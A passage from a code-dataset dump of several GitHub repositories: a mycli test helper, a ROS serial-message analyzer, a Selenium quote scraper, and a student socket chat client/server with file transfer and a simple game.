process using pexpect.\"\"\"\n run_args = run_args or []\n if context.conf.get('host', None):\n run_args.extend(('-h', context.conf['host']))\n if context.conf.get('user', None):\n run_args.extend(('-u', context.conf['user']))\n if context.conf.get('pass', None):\n run_args.extend(('-p', context.conf['pass']))\n if context.conf.get('dbname', None):\n run_args.extend(('-D', context.conf['dbname']))\n if context.conf.get('defaults-file', None):\n run_args.extend(('--defaults-file', context.conf['defaults-file']))\n if context.conf.get('myclirc', None):\n run_args.extend(('--myclirc', context.conf['myclirc']))\n try:\n cli_cmd = context.conf['cli_command']\n except KeyError:\n cli_cmd = (\n '{0!s} -c \"'\n 'import coverage ; '\n 'coverage.process_startup(); '\n 'import mycli.main; '\n 'mycli.main.cli()'\n '\"'\n ).format(sys.executable)\n\n cmd_parts = [cli_cmd] + run_args\n cmd = ' '.join(cmd_parts)\n context.cli = pexpect.spawnu(cmd, cwd=context.package_root)\n context.logfile = StringIO()\n context.cli.logfile = context.logfile\n context.exit_sent = False\n context.currentdb = context.conf['dbname']\n\n\ndef wait_prompt(context):\n \"\"\"Make sure prompt is displayed.\"\"\"\n user = context.conf['user']\n host = context.conf['host']\n dbname = context.currentdb\n expect_exact(context, '{0}@{1}:{2}> '.format(\n user, host, dbname), timeout=5)\n context.atprompt = True\n" } ]
3
topcuemre/ITU_Rover_Assignment
https://github.com/topcuemre/ITU_Rover_Assignment
663d215b34c20ad5153188d162ff17a4cedc2459
389705e4b5064d34e6364c7418565697df1a7a9e
16fbb24929d5f077c98120cf7f9d3736daea1e52
refs/heads/main
2023-07-18T16:23:48.840513
2021-09-02T20:43:40
2021-09-02T20:43:40
402,557,743
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.4292546808719635, "alphanum_fraction": 0.4531686007976532, "avg_line_length": 29.585365295410156, "blob_id": "d7748bc5146804f2c5b2e1b9a771cc68bbb3a4e6", "content_id": "9212adc34fdd716eab55efce0ba56f2b0dcaeb4f", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2509, "license_type": "no_license", "max_line_length": 75, "num_lines": 82, "path": "/analyzer_node.py", "repo_name": "topcuemre/ITU_Rover_Assignment", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\nimport rospy\nfrom std_msgs.msg import String\n\nn_data = String()\nstart = False\npub_drive = rospy.Publisher('/position/drive', String, queue_size = 10)\npub_arm = rospy.Publisher('/position/robotic_arm', String, queue_size = 10)\n\ndef callback(data):\n global start, n_data\n n_data = filter(data.data)\n if type(n_data) == str:\n n_data = trim(n_data)\n n_data = reader(n_data)\n rospy.loginfo(n_data)\n if (not start):\n start = True\n\ndef reader(msg):\n msg_mod = ''\n if len(msg) == 16:\n for i in range(0, 16, 4):\n if msg[i] == '0':\n if int(msg[ i+1 : i+4]) > 255:\n limit = str(255)\n msg_mod = msg_mod + '+' + limit + ' '\n else:\n msg_mod = msg_mod + '+' + msg[ i+1 : i+4 ] + ' '\n else:\n if int(msg[ i+1 : i+4]) < -255:\n limit = str(-255)\n msg_mod = msg_mod + '+' + limit + ' '\n else:\n msg_mod = msg_mod + '-' + msg[ i+1 : i+4 ] + ' '\n return msg_mod\n print(msg_mod)\n else:\n for i in range(0, 24, 4):\n if msg[i] == '0':\n if int(msg[ i+1 : i+4]) > 255:\n limit = str(255)\n msg_mod = msg_mod + '+' + limit + ' '\n else:\n msg_mod = msg_mod + '+' + msg[ i+1 : i+4 ] + ' '\n else:\n if int(msg[ i+1 : i+4]) < -255:\n limit = str(-255)\n msg_mod = msg_mod + '+' + limit + ' '\n else:\n msg_mod = msg_mod + '-' + msg[ i+1 : i+4 ] + ' '\n return msg_mod\n print(msg_mod)\n\ndef filter(msg):\n if msg.startswith('A') and msg.endswith('B'):\n return msg\n\ndef trim(msg):\n msg_repl = msg.replace('A','').replace('B','')\n return msg_repl\n\ndef timer_callback(event):\n global start, pub_drive, pub_arm, n_data\n if (start) and type(n_data) == str:\n if (len(n_data) == 20):\n pub_drive.publish(n_data)\n else:\n pub_arm.publish(n_data)\n\ndef main():\n rospy.init_node('analyzer_node')\n rospy.Subscriber('/serial/drive', String, callback)\n rospy.Subscriber('/serial/robotic_arm', String, callback) \n timer = rospy.Timer(rospy.Duration(1.), timer_callback)\n rospy.spin()\n timer.shutdown()\n\nif __name__ == '__main__':\n main()\n\n" } ]
1
damnbhola/Browser-Automation-with-Selenium
https://github.com/damnbhola/Browser-Automation-with-Selenium
25c91d6432ce51e944c097e2bb9538e9f3e8d723
bef4b8edbe1dfc79f29462de762c13ebe656251f
646ee2a712d6bfb7868be1092de390a91fb59930
refs/heads/master
2022-05-16T20:20:36.511045
2020-04-26T06:28:35
2020-04-26T06:28:35
258,954,972
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.6700043678283691, "alphanum_fraction": 0.670875072479248, "avg_line_length": 35.655738830566406, "blob_id": "ddc4cce07587ec392c557f13b1fe3ce1064c5dbd", "content_id": "a2cc466b87c357df1e92a47b285eaafd3e3a809d", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2297, "license_type": "no_license", "max_line_length": 94, "num_lines": 61, "path": "/pages/quote_page.py", "repo_name": "damnbhola/Browser-Automation-with-Selenium", "src_encoding": "UTF-8", "text": "from typing import List\r\nfrom selenium.common.exceptions import NoSuchElementException\r\nfrom selenium.webdriver.support.ui import Select\r\nfrom locators.quote_page_locators import QuotePageLocators\r\nfrom parsers.quote import QuoteParser\r\n# for adding wait\r\nfrom selenium.webdriver.common.by import By\r\nfrom selenium.webdriver.support import expected_conditions\r\nfrom selenium.webdriver.support.wait import WebDriverWait\r\n\r\n\r\nclass QuotePage:\r\n def __init__(self, browser):\r\n self.browser = browser\r\n\r\n @property\r\n def quotes(self) -> List[QuoteParser]:\r\n locator = QuotePageLocators.QUOTE\r\n quote_tags = self.browser.find_elements_by_css_selector(locator)\r\n return [QuoteParser(e) for e in quote_tags]\r\n\r\n @property\r\n def author_dropdown(self) -> Select:\r\n element = self.browser.find_element_by_css_selector(QuotePageLocators.AUTHOR_DROPDOWN)\r\n return Select(element)\r\n\r\n @property\r\n def tag_dropdown(self) -> Select:\r\n element = self.browser.find_element_by_css_selector(QuotePageLocators.TAG_DROPDOWN)\r\n return Select(element)\r\n\r\n @property\r\n def search_button(self):\r\n return self.browser.find_element_by_css_selector(QuotePageLocators.SEARCH_BUTTON)\r\n\r\n def get_available_authors(self) -> List[str]:\r\n return [option.text.strip() for option in self.author_dropdown.options]\r\n\r\n def select_author(self, author_name: str):\r\n self.author_dropdown.select_by_visible_text(author_name)\r\n\r\n def get_available_tags(self) -> List[str]:\r\n return [option.text.strip() for option in self.tag_dropdown.options]\r\n\r\n def select_tag(self, tag_name: str):\r\n self.tag_dropdown.select_by_visible_text(tag_name)\r\n\r\n def search_for_quotes(self, author: str, tag: str):\r\n self.select_author(author)\r\n WebDriverWait(self.browser, 10).until(\r\n expected_conditions.presence_of_all_elements_located(\r\n (By.CSS_SELECTOR, QuotePageLocators.TAG_DROPDOWN_VALUE_OPTION)\r\n )\r\n )\r\n try:\r\n self.select_tag(tag)\r\n except NoSuchElementException:\r\n return f\"Message: Author '{author}' does not have a tag '{tag}'.\"\r\n else:\r\n self.search_button.click()\r\n return self.quotes\r\n" }, { "alpha_fraction": 0.6691666841506958, "alphanum_fraction": 0.6691666841506958, "avg_line_length": 28, "blob_id": "6725239ad13d7d7589a2c22c0b98fc70798a7dac", "content_id": "b543345e095ebdd0212670df9fd3b0ab072e5795", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1200, "license_type": "no_license", "max_line_length": 97, "num_lines": 40, "path": "/app.py", "repo_name": "damnbhola/Browser-Automation-with-Selenium", "src_encoding": "UTF-8", "text": "from selenium import webdriver\r\nfrom pages.quote_page import QuotePage, NoSuchElementException\r\n\r\ntry:\r\n author = input(\"Enter the author you'd like quotes of: \")\r\n tag = input(\"Enter the tag you want: \")\r\n\r\n chrome = webdriver.Chrome(executable_path=\"/Users/daman/Downloads/chromedriver/chromedriver\")\r\n chrome.get(\"http://quotes.toscrape.com/search.aspx\")\r\n page = QuotePage(chrome)\r\n print(page.search_for_quotes(author, tag))\r\nexcept NoSuchElementException as e:\r\n print(e)\r\nexcept Exception as e:\r\n print(e)\r\n print(\"An Unknown Error occurred. Please Try again later...\")\r\n\r\n'''\r\nfor quote in page.quotes:\r\n print(\"\\n\" + quote.content)\r\n print(\"- \" + quote.author)\r\n print(quote.tags)\r\n'''\r\n'''\r\nauthors = page.get_available_authors()\r\nprint(\"Select one of these authors: [{}]\".format(\" | \".join(authors)))\r\nauthor = input(\"Enter the author you'd like quotes of: \")\r\npage.select_author(author)\r\n\r\ntags = page.get_available_tags()\r\nprint(\"Select one of these tags: [{}]\".format(\" | \".join(tags)))\r\ntag = input(\"Enter the tag you want: \")\r\npage.select_tag(tag)\r\n\r\npage.search_button.click()\r\n\r\nquotes = page.quotes\r\nfor quote in quotes:\r\n print(quote)\r\n'''\r\n" } ]
2
J1E1D71/ICS_Final
https://github.com/J1E1D71/ICS_Final
33a0043b336bc33cc6ad5026615d490e810fdeb3
f2b03188b946be7fca666e24861e9f0f98b1e848
f4cfee101841b7c73130211daf9b51a3595421b1
refs/heads/master
2020-03-15T04:07:44.384563
2018-05-10T07:06:40
2018-05-10T07:06:40
131,958,225
0
1
null
null
null
null
null
[ { "alpha_fraction": 0.4498259723186493, "alphanum_fraction": 0.468097448348999, "avg_line_length": 29.214284896850586, "blob_id": "b83bb07788cbbe1525230593d2df08d70825ce1e", "content_id": "df9f6fecebb311dd5d1880953dcb64e1ebd1d729", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 3448, "license_type": "no_license", "max_line_length": 94, "num_lines": 112, "path": "/player.py", "repo_name": "J1E1D71/ICS_Final", "src_encoding": "UTF-8", "text": "# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Mon Apr 30 18:56:08 2018\n\n@author: Lenovo\n\"\"\"\n\nclass Player:\n def __init__(self,name):\n self.name = name\n self.energy = {'wave':0,'stone':0}\n self.options = ['defense wave','wave energy +1','stone +1']\n self.choice = ''\n \n def update(self):\n\n if self.choice == 'defense wave':\n pass\n \n elif self.choice == 'wave energy +1':\n self.set_energy('wave',1)\n \n elif self.choice == 'stone +1':\n self.set_energy('stone',1)\n \n elif self.choice == 'wave 1':\n self.set_energy('wave',-1)\n \n elif self.choice == 'stone 1':\n self.set_energy('stone',-1)\n \n elif self.choice == 'wave 2':\n self.set_energy('wave',-2)\n \n elif self.choice == 'stone 2':\n self.set_energy('stone',-2)\n \n elif self.choice == 'wave 3':\n self.set_energy('wave',-3)\n \n elif self.choice == 'stone 3':\n self.set_energy('stone',-3)\n \n self.add_opition()\n \n \n def set_energy(self,kind,change):\n self.energy[kind] += change\n \n def add_opition(self):\n attack = ['stone 1','wave 1','stone 2','wave 2','stone 3','wave 3']\n for i in ['wave','stone']:\n if (self.energy[i] == 1) and (str(i+' 1') not in self.options):\n self.options.append(str(i+' 1')) \n \n elif (self.energy[i] == 2) and ( str(i+' 2') not in self.options):\n self.options.append(str(i+' 2')) \n \n elif (self.energy[i] == 3) and (str(i+' 3') not in self.options):\n self.options.append(str(i+' 3')) \n for i in self.options:\n if i in attack:\n try:\n value = int(i[-1])\n except:\n value = 1\n if value > self.energy[i[:5].strip()]:\n self.options.remove(i)\n \n \n def set_choice(self,num):\n self.choice = self.options[num]\n \n \n def get_option(self):\n return self.options\n \n def clear_choice(self):\n self.choice = ''\n \n def fight(self,enemy):\n non_attack = ['defense wave','wave energy +1','stone +1']\n attack = ['stone 1','wave 1','stone 2','wave 2','stone 3','wave 3']\n if self.choice == enemy.choice:\n return 'tie'\n \n elif (self.choice in non_attack) and (enemy.choice in non_attack):\n return 'tie'\n \n elif self.choice == 'defense wave':\n return 'tie' if enemy.choice == 'wave' else False\n\n elif (self.choice in attack) and (enemy.choice in attack):\n return True if (attack.index(self.choice) > attack.index(enemy.choice)) else False\n\n elif self.choice == 'wave' and enemy.choice == 'defense wave':\n return 'tie' \n \n elif enemy.choice[:5] == 'stone' and self.choice == 'stone +1':\n if (int(enemy.choice[-1]) - 1) <= self.energy['stone']:\n return 'tie'\n else:\n return False\n\n elif (self.choice in attack) and (enemy.choice in non_attack):\n return True\n \n else:\n return False\n\na = Player('new')\nb = Player('old') \n \n \n \n \n \n \n" }, { "alpha_fraction": 0.38555431365966797, "alphanum_fraction": 0.3915061056613922, "avg_line_length": 41.182979583740234, "blob_id": "8a48a7e8ed5ad65611cb02f1d3182db08a42576c", "content_id": "dcc0ede52d18de6ff3e0e346ea9c4e5f70c35268", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 9913, "license_type": "no_license", "max_line_length": 165, "num_lines": 235, "path": "/client_state_machine.py", "repo_name": "J1E1D71/ICS_Final", "src_encoding": "UTF-8", "text": "\"\"\"\nCreated on Sun Apr 5 00:00:32 2015\n\n@author: zhengzhang\n\"\"\"\n\"\"\"\nCreated on Sun Apr 5 00:00:32 2015\n\n@author: zhengzhang\n\"\"\"\nfrom chat_utils import *\nimport json\nimport os\nimport base64\n\nclass ClientSM:\n def __init__(self, s):\n self.state = S_OFFLINE\n self.peer = ''\n self.me = ''\n self.out_msg = ''\n self.s = s\n\n def set_state(self, state):\n self.state = state\n\n def get_state(self):\n return self.state\n\n def set_myname(self, name):\n self.me = name\n\n def get_myname(self):\n return self.me\n\n def connect_to(self, peer):\n msg = json.dumps({\"action\":\"connect\", \"target\":peer})\n mysend(self.s, msg)\n response = json.loads(myrecv(self.s))\n if response[\"status\"] == \"success\":\n self.peer = peer\n self.out_msg += 'You are connected with '+ self.peer + '\\n'\n return (True)\n elif response[\"status\"] == \"busy\":\n self.out_msg += 'User is busy. Please try again later\\n'\n elif response[\"status\"] == \"self\":\n self.out_msg += 'Cannot talk to yourself (sick)\\n'\n else:\n self.out_msg += 'User is not online, try again later\\n'\n return(False)\n\n def disconnect(self):\n msg = json.dumps({\"action\":\"disconnect\"})\n mysend(self.s, msg)\n self.out_msg += 'You are disconnected from ' + self.peer + '\\n'\n self.peer = ''\n\n def proc(self, my_msg, peer_msg):\n self.out_msg = ''\n#==============================================================================\n# Once logged in, do a few things: get peer listing, connect, search\n# And, of course, if you are so bored, just go\n# This is event handling instate \"S_LOGGEDIN\"\n#==============================================================================\n if self.state == S_LOGGEDIN:\n # todo: can't deal with multiple lines yet\n if len(my_msg) > 0:\n\n if my_msg == 'q':\n self.out_msg += 'See you next time!\\n'\n self.state = S_OFFLINE\n\n elif my_msg == 'time':\n mysend(self.s, json.dumps({\"action\":\"time\"}))\n time_in = json.loads(myrecv(self.s))[\"results\"]\n self.out_msg += \"Time is: \" + time_in\n\n elif my_msg == 'who':\n mysend(self.s, json.dumps({\"action\":\"list\"}))\n logged_in = json.loads(myrecv(self.s))[\"results\"]\n self.out_msg += 'Here are all the users in the system:\\n'\n self.out_msg += logged_in\n\n elif my_msg[0] == 'c':\n peer = my_msg[1:]\n peer = peer.strip()\n if self.connect_to(peer) == True:\n self.state = S_CHATTING\n self.out_msg += 'Connect to ' + peer + '. Chat away!\\n\\n'\n self.out_msg += '-----------------------------------\\n'\n else:\n self.out_msg += 'Connection unsuccessful\\n'\n\n elif my_msg[0] == '?':\n term = my_msg[1:].strip()\n mysend(self.s, json.dumps({\"action\":\"search\", \"target\":term}))\n search_rslt = json.loads(myrecv(self.s))[\"results\"][1:].strip()\n if (len(search_rslt)) > 0:\n self.out_msg += search_rslt + '\\n\\n'\n else:\n self.out_msg += '\\'' + term + '\\'' + ' not found\\n\\n'\n\n elif my_msg[0] == 'p' and my_msg[1:].isdigit():\n poem_idx = my_msg[1:].strip()\n mysend(self.s, json.dumps({\"action\":\"poem\", \"target\":poem_idx}))\n poem = json.loads(myrecv(self.s))[\"results\"][1:].strip()\n if (len(poem) > 0):\n self.out_msg += poem + '\\n\\n'\n else:\n self.out_msg += 'Sonnet ' + poem_idx + ' not found\\n\\n'\n elif my_msg [:12]==\"write a poem\":\n mysend(self.s,json.dumps({\"action\":\"write\"}))\n sentence = json.loads(myrecv(self.s))[\"results\"].strip()\n self.out_msg += sentence\n\n else:\n self.out_msg += menu\n\n if len(peer_msg) > 0:\n peer_msg = json.loads(peer_msg)\n if peer_msg[\"action\"] == \"connect\":\n self.peer = peer_msg[\"from\"]\n self.out_msg += 'Request from ' + self.peer + '\\n'\n self.out_msg += 'You are connected with ' + self.peer\n self.out_msg += '. Chat away!\\n\\n'\n self.out_msg += '------------------------------------\\n'\n self.state = S_CHATTING\n\n#==============================================================================\n# Start chatting, 'bye' for quit\n# This is event handling instate \"S_CHATTING\"\n#==============================================================================\n elif self.state == S_CHATTING:\n if len(my_msg) > 0: # my stuff going out\n mysend(self.s, json.dumps({\"action\":\"exchange\", \"from\":\"[\" + self.me + \"]\", \"message\":my_msg}))\n if my_msg == 'bye':\n self.disconnect()\n self.state = S_LOGGEDIN\n self.peer = ''\n elif my_msg[:10] == 'send file:':\n file_name = my_msg[10:]\n if os.path.isfile(file_name):\n with open(file_name, 'rb') as f:\n data = base64.b64encode(f.read())\n data = data.decode('utf-8')\n self.out_msg += 'file read'\n try:\n \n mysend(self.s,json.dumps({\"action\":\"file exchange\", \"from\":\"[\" + self.me + \"]\", \"file\":data,'message':'You should check the new file.'}))\n self.out_msg += 'file sent'\n except:\n self.out_msg += 'no such file'\n elif my_msg == \"let's play a game\":\n mysend(self.s,json.dumps({\"action\":\"game\", \"from\":\"[\" + self.me + \"]\",\"connect\":False}))\n self.out_msg += 'waiting for response......'\n \n if len(peer_msg) > 0: # peer's stuff, coming in\n peer_msg = json.loads(peer_msg)\n if peer_msg[\"action\"] == \"connect\":\n self.out_msg += \"(\" + peer_msg[\"from\"] + \" joined)\\n\"\n elif peer_msg[\"action\"] == \"disconnect\":\n self.state = S_LOGGEDIN\n elif peer_msg['action'] == 'file exchange':\n save_path = r\"C:\\Users\\Lenovo\\desktop\"\n data = peer_msg['file']\n data = bytes(data,encoding = 'utf-8')\n try:\n with open('pic_received.jpg', 'wb') as f:\n data = base64.b64decode(data)\n f.write(data)\n self.out_msg += 'you got a file from' + peer_msg['from']\n except:\n self.out_msg += 'can not write'\n elif peer_msg['action'] == 'game':\n if peer_msg['connect'] == False:\n self.out_msg += peer_msg['message']\n else:\n try:\n self.out_msg += peer_msg['message']\n mysend(self.s,json.dumps({'action':'game','connect':True}))\n self.out_msg += 'changing state'\n self.state = S_GAME\n except:\n self.out_msg += 'something wrong 1'\n else:\n self.out_msg += peer_msg[\"from\"] + peer_msg[\"message\"]\n\n\n # Display the menu again\n if self.state == S_LOGGEDIN:\n self.out_msg += menu\n \n# =============================================================================\n# GAME STATE! \n# =============================================================================\n elif self.state == S_GAME:\n try:\n if len(peer_msg) > 0:\n print('got message')\n peer_msg = json.loads(peer_msg)\n# print(peer_msg)\n if peer_msg['connect'] == True:\n msg = peer_msg['message']\n self.out_msg += msg + '\\n'\n if 'options' in peer_msg:\n options = peer_msg['options']\n for i in range(len(options)):\n self.out_msg += str(i) + ':' + options[i] + '\\t'\n else:\n result = peer_msg ['message']\n self.out_msg += result\n self.state = S_CHATTING\n \n if len(my_msg) > 0 :\n mysend(self.s,json.dumps({'action':'game','connect':True, 'choice':int(my_msg)}))\n self.out_msg += 'message sent, choice is ' + str(my_msg)\n except:\n self.out_msg += 'something wrong 2'\n \n \n \n \n \n \n \n \n \n#==============================================================================\n# invalid state\n#==============================================================================\n else:\n self.out_msg += 'How did you wind up here??\\n'\n print_state(self.state)\n\n return self.out_msg\n" }, { "alpha_fraction": 0.406261682510376, "alphanum_fraction": 0.40975427627563477, "avg_line_length": 51.563934326171875, "blob_id": "b8c38364f31a20db9f6d50cc92edf8afaaea9165", "content_id": "18cfd4bfb8ff411d64745a8a99bf92903358aef4", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 16034, "license_type": "no_license", "max_line_length": 174, "num_lines": 305, "path": "/chat_server.py", "repo_name": "J1E1D71/ICS_Final", "src_encoding": "UTF-8", "text": "\"\"\"\nCreated on Tue Jul 22 00:47:05 2014\n\n@author: alina, zzhang\n\"\"\"\n\nimport time\nimport socket\nimport select\nimport sys\nimport string\nimport indexer\nimport json\nimport pickle as pkl\nfrom chat_utils import *\nimport chat_group as grp\nimport player\nimport generator\n\nclass Server:\n def __init__(self):\n self.new_clients = [] #list of new sockets of which the user id is not known\n self.logged_name2sock = {} #dictionary mapping username to socket\n self.logged_sock2name = {} # dict mapping socket to user name\n self.all_sockets = []\n self.group = grp.Group()\n #start server\n self.server=socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n self.server.bind(SERVER)\n self.server.listen(5)\n self.all_sockets.append(self.server)\n #initialize past chat indices\n self.indices={}\n # sonnet\n self.sonnet_f = open('AllSonnets.txt.idx', 'rb')\n self.sonnet = pkl.load(self.sonnet_f)\n self.sonnet_f.close()\n self.players = {}\n def new_client(self, sock):\n #add to all sockets and to new clients\n print('new client...')\n sock.setblocking(0)\n self.new_clients.append(sock)\n self.all_sockets.append(sock)\n\n def login(self, sock):\n #read the msg that should have login code plus username\n try:\n msg = json.loads(myrecv(sock))\n if len(msg) > 0:\n\n if msg[\"action\"] == \"login\":\n name = msg[\"name\"]\n if self.group.is_member(name) != True:\n #move socket from new clients list to logged clients\n self.new_clients.remove(sock)\n #add into the name to sock mapping\n self.logged_name2sock[name] = sock\n self.logged_sock2name[sock] = name\n #load chat history of that user\n if name not in self.indices.keys():\n try:\n self.indices[name]=pkl.load(open(name+'.idx','rb'))\n except IOError: #chat index does not exist, then create one\n self.indices[name] = indexer.Index(name)\n print(name + ' logged in')\n self.group.join(name)\n mysend(sock, json.dumps({\"action\":\"login\", \"status\":\"ok\"}))\n else: #a client under this name has already logged in\n mysend(sock, json.dumps({\"action\":\"login\", \"status\":\"duplicate\"}))\n print(name + ' duplicate login attempt')\n else:\n print ('wrong code received')\n else: #client died unexpectedly\n self.logout(sock)\n except:\n self.all_sockets.remove(sock)\n\n def logout(self, sock):\n #remove sock from all lists\n name = self.logged_sock2name[sock]\n pkl.dump(self.indices[name], open(name + '.idx','wb'))\n del self.indices[name]\n del self.logged_name2sock[name]\n del self.logged_sock2name[sock]\n self.all_sockets.remove(sock)\n self.group.leave(name)\n sock.close()\n\n#==============================================================================\n# main command switchboard\n#==============================================================================\n def handle_msg(self, from_sock):\n #read msg code\n msg = myrecv(from_sock)\n if len(msg) > 0:\n#==============================================================================\n# handle connect request\n#==============================================================================\n msg = json.loads(msg)\n if msg[\"action\"] == \"connect\":\n to_name = msg[\"target\"]\n from_name = self.logged_sock2name[from_sock]\n if to_name == from_name:\n msg = json.dumps({\"action\":\"connect\", \"status\":\"self\"})\n # connect to the peer\n elif self.group.is_member(to_name):\n to_sock = self.logged_name2sock[to_name]\n self.group.connect(from_name, to_name)\n the_guys = self.group.list_me(from_name)\n msg = json.dumps({\"action\":\"connect\", \"status\":\"success\"})\n for g in the_guys[1:]:\n to_sock = self.logged_name2sock[g]\n mysend(to_sock, json.dumps({\"action\":\"connect\", \"status\":\"request\", \"from\":from_name}))\n else:\n msg = json.dumps({\"action\":\"connect\", \"status\":\"no-user\"})\n mysend(from_sock, msg)\n#==============================================================================\n# handle messeage exchange: one peer for now. will need multicast later\n#==============================================================================\n elif msg[\"action\"] == \"exchange\":\n from_name = self.logged_sock2name[from_sock]\n the_guys = self.group.list_me(from_name)\n #said = msg[\"from\"]+msg[\"message\"]\n said2 = text_proc(msg[\"message\"], from_name)\n self.indices[from_name].add_msg_and_index(said2)\n for g in the_guys[1:]:\n to_sock = self.logged_name2sock[g]\n self.indices[g].add_msg_and_index(said2)\n mysend(to_sock, json.dumps({\"action\":\"exchange\", \"from\":msg[\"from\"], \"message\":msg[\"message\"]}))\n#==============================================================================\n# listing available peers\n#==============================================================================\n elif msg[\"action\"] == \"list\":\n from_name = self.logged_sock2name[from_sock]\n msg = self.group.list_all(from_name)\n mysend(from_sock, json.dumps({\"action\":\"list\", \"results\":msg}))\n#==============================================================================\n# retrieve a sonnet\n#==============================================================================\n elif msg[\"action\"] == \"poem\":\n poem_indx = int(msg[\"target\"])\n from_name = self.logged_sock2name[from_sock]\n print(from_name + ' asks for ', poem_indx)\n poem = self.sonnet.get_sect(poem_indx)\n print('here:\\n', poem)\n mysend(from_sock, json.dumps({\"action\":\"poem\", \"results\":poem}))\n#==============================================================================\n# time\n#==============================================================================\n elif msg[\"action\"] == \"time\":\n ctime = time.strftime('%d.%m.%y,%H:%M', time.localtime())\n mysend(from_sock, json.dumps({\"action\":\"time\", \"results\":ctime}))\n#==============================================================================\n# search\n#==============================================================================\n elif msg[\"action\"] == \"search\":\n term = msg[\"target\"]\n from_name = self.logged_sock2name[from_sock]\n print('search for ' + from_name + ' for ' + term)\n search_rslt = (self.indices[from_name].search(term)).strip()\n print('server side search: ' + search_rslt)\n mysend(from_sock, json.dumps({\"action\":\"search\", \"results\":search_rslt}))\n# =============================================================================\n# write poem\n# =============================================================================\n elif msg[\"action\"] == \"write\":\n mysend(from_sock, json.dumps({\"action\":\"write\", \"results\":generator.generator()}))\n#==============================================================================\n# the \"from\" guy has had enough (talking to \"to\")!\n#==============================================================================\n elif msg[\"action\"] == \"disconnect\":\n from_name = self.logged_sock2name[from_sock]\n the_guys = self.group.list_me(from_name)\n self.group.disconnect(from_name)\n the_guys.remove(from_name)\n if len(the_guys) == 1: # only one left\n g = the_guys.pop()\n to_sock = self.logged_name2sock[g]\n mysend(to_sock, json.dumps({\"action\":\"disconnect\"}))\n#==============================================================================\n# the \"from\" guy really, really has had enough\n#==============================================================================\n elif msg['action'] == 'file exchange':\n from_name = self.logged_sock2name[from_sock]\n the_guys = self.group.list_me(from_name)\n for g in the_guys[1:]:\n to_sock = self.logged_name2sock[g]\n mysend(to_sock, json.dumps({\"action\":\"file exchange\", \"from\":msg[\"from\"], \"file\":msg[\"file\"]}))\n# =============================================================================\n# Try to start a game \n# =============================================================================\n \n elif msg['action'] == 'game':\n rules = 'select one option from the list each time \\n'\n rules += \"\\ndefense wave: defend wave(can NOT defend greater wave and any stone!) \\n\"\n rules += \"wave energy +1: save energy to send a (greater) wave next round \\n\"\n rules += \"stone +1: fetch a stone to throw in next round \\n\"\n rules += \"In the same round, wave beats stone, stone 2 beats wave \\n\"\n rules += \"If your enemy throws a stone to you when you are fetching a stone, you'll be protected by your stone \\n \"\n from_name = self.logged_sock2name[from_sock]\n the_other = self.group.list_me(from_name)[1]\n if msg['connect'] == False:\n if len(self.group.list_me(from_name)) != 2:\n mysend(from_sock,json.dumps({\"action\":\"game\",\"connect\":False,\"message\":'Too many people here.'}))\n other_guys = self.group.list_me(from_name)[1:]\n for g in other_guys:\n to_sock = self.logged_name2sock[g]\n print('connection failed')\n mysend(to_sock,json.dumps({\"action\":\"game\",\"connect\":False,\"message\":'Too many people here.'}))\n else:\n try:\n for g in self.group.list_me(from_name):\n to_sock = self.logged_name2sock[g]\n mysend(to_sock,json.dumps({\"action\":\"game\",\"connect\":True,\"message\":'There you go.\\n'+rules}))\n print(\"Connecting two players\")\n except:\n print('no way')\n else:\n try:\n if from_name not in self.players:\n print('found a new player')\n print('creating object')\n self.players[from_name] = player.Player(str(from_name))\n print('adding to the list')\n mysend(from_sock,json.dumps({\"action\":\"game\",'options':self.players[from_name].get_option(),'connect':True,'message':\"select one option\"}))\n print('sending message')\n else:\n print('find'+from_name)\n print(self.players[from_name].choice)\n self.players[from_name].set_choice(msg['choice'])\n print('choice set for '+ str(from_name)+' '+self.players[from_name].choice)\n if (self.players[the_other].choice != ''):\n print('both have choice')\n two_choice = ''\n for p in self.players.values():\n two_choice += (p.name + ': ' + p.choice + ' ')\n result = self.players[from_name].fight(self.players[the_other])\n print('got result')\n \n while result == 'tie':\n print('result is tie')\n result = ''\n for g in self.group.list_me(from_name):\n print(g)\n print('updating info')\n self.players[g].update()\n self.players[g].clear_choice()\n print('finding sock')\n to_sock = self.logged_name2sock[g]\n mysend(to_sock,json.dumps({\"action\":\"game\",\"connect\":True,\"message\":'tie' +' '+ two_choice ,'options':self.players[g].get_option()}))\n print('tie, sending msgs to '+ str(g))\n \n my_sock = self.logged_name2sock[from_name]\n to_sock = self.logged_name2sock[the_other]\n if result == True:\n result = ''\n mysend(my_sock,json.dumps({\"action\":\"game\",\"connect\":False,\"message\":'you win'+' '+two_choice}))\n mysend(to_sock,json.dumps({\"action\":\"game\",\"connect\":False,\"message\":'you lose'' '+two_choice}))\n self.players = {}\n elif result == False:\n result = ''\n mysend(my_sock,json.dumps({\"action\":\"game\",\"connect\":False,\"message\":'you lose'+' '+two_choice}))\n mysend(to_sock,json.dumps({\"action\":\"game\",\"connect\":False,\"message\":'you win'+' '+two_choice}))\n self.players = {}\n else:\n print('NOT both have choice')\n pass\n except:\n print('dont work')\n \n \n# =============================================================================\n# send files via sever \n# =============================================================================\n\n else:\n #client died unexpectedly\n self.logout(from_sock)\n\n#==============================================================================\n# main loop, loops *forever*\n#==============================================================================\n def run(self):\n print ('starting server...')\n while(1):\n read,write,error=select.select(self.all_sockets,[],[])\n print('checking logged clients..')\n for logc in list(self.logged_name2sock.values()):\n if logc in read:\n self.handle_msg(logc)\n print('checking new clients..')\n for newc in self.new_clients[:]:\n if newc in read:\n self.login(newc)\n print('checking for new connections..')\n if self.server in read :\n #new client request\n sock, address=self.server.accept()\n self.new_client(sock)\ndef main():\n server=Server()\n server.run()\n\nmain()\n\n\n" }, { "alpha_fraction": 0.48148149251937866, "alphanum_fraction": 0.5856481194496155, "avg_line_length": 27.866666793823242, "blob_id": 